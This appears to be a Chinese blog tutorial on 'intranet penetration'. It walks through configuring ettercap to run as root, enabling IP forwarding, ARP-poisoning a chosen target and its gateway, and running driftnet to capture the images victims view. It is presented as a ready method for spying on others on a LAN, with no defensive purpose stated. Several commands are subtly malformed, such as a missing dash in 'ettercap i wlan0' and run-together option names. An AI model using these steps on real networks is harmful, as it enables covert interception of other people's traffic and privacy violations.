内网渗透技术的过程

环境:linux 

    这里先不写怎么进入这个局域网。假设已经在这个局域网内了。

    基本原理:嗅探,arp欺骗,会话劫持等原理,可以自行搜索原理进行了解,这里只是做出实例进行参考。

    过程探讨:假如是第一次作为第三者的朋友,进行配置文件的修改。

    首先进行NetWorkManger中配置文件的修改。

        vi /etc/NetworkManager/NetworkManager.conf

    修改其中的 managed选项,第一次打开的朋友需要将managed选项有false变为true,再然后启动NetWorkManager服务。

        service network-manager restart

    再然后修改ettercap的配置文件

        vi /etc/ettercap/etter.conf

    修改其中的[privs]下的ec_uidec_gid选项,初次打开时会是ec_uidec_gid都同时等于65535情况,两者统一修改为等于0如下图所示:


    再然后将此配置文件中的linux选项中的#if you use iptables解释进行解放,将注释符去掉,修改后结果图如下:

配置完毕后, 下一步输入以下代码:

cat /proc/sys/net/ipv4/ip_forward

当然看你喜好,你也可以输入 

vi/vim /proc/sys/net/ipv4/ip_forward

进入文件查看,当数值为0时修改成为1。

代码执行如下:

echo 1 >> /proc/sys/net/ipv4/ip_forward

下面就是核心了代码了:

ettercap i wlan0 -Tq -M arp:/目标主机IP地址/ /网关地址/

"/"这个符号是不能省略掉的。当想要嗅探这个局域网内所有的机器时就将目标IP变为空;同理要想嗅探所有网络的IP的话就将网关地址为空。当然在两者全部为空的时候会出现错误提示,这时可以把“/”变为三个。

这时服务已经启动起来了。

我们再打开一个终端,并且打开driftnet服务 参数如下:driftnet -i net。当然 -i参数只是比较普通的一个参数,想要详细了解的朋友可以搜索一下资料。这时如果对方在浏览图片信息,driftnet就可以传输出图像数据了。

这时内网渗透基本完成。谢谢大家阅读我的文章。



你可能感兴趣的:(内网渗透技术的过程)